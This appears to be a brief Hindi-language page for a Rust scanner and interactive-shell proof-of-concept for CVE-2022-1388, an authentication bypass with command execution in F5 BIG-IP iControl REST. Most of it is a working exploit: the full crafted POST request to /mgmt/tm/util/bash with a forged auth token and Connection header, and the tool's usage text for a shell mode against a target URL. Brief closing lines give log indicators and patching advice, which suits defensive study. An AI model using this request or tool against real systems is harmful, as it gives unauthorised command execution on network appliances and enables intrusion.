
CVE-2022-1388 F5 BIG-IP iControl REST प्रमाणीकरण बायपास RCE Rust में लिखा गया
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE के लिए स्कैनर और इंटरैक्टिव शेल, जो Rust में लिखा गया है
सब कुछ समेटने के लिए, इस भेद्यता का शोषण करने वाले अनुरोध के लिए आवश्यक शर्तों का अवलोकन यहाँ है:
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
"command":"run",
"utilCmdArgs":"-c id"
}
$ cve_2022_1308_rs -h
CVE-2022-1388 PoC 1.0
Petruknisme <[email protected]>
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in
Rust
USAGE:
cve_2022_1388_rs [OPTIONS] --url <URL>
OPTIONS:
-h, --help Print help information
-s, --shell This mode for accessing payload with interactive shell
-u, --url <URL> F5 Big-IP target url
-V, --version Print version information
IOCs को /var/log/audit लॉग फ़ाइल में पाया जा सकता है। mgmt/tm/util/bash एंडपॉइंट द्वारा निष्पादित अज्ञात कमांड चिंता का कारण होनी चाहिए।
नवीनतम संस्करण में अपडेट करें या F5 सुरक्षा सलाहकार में दिए गए निर्देशों का पालन करके शमन करें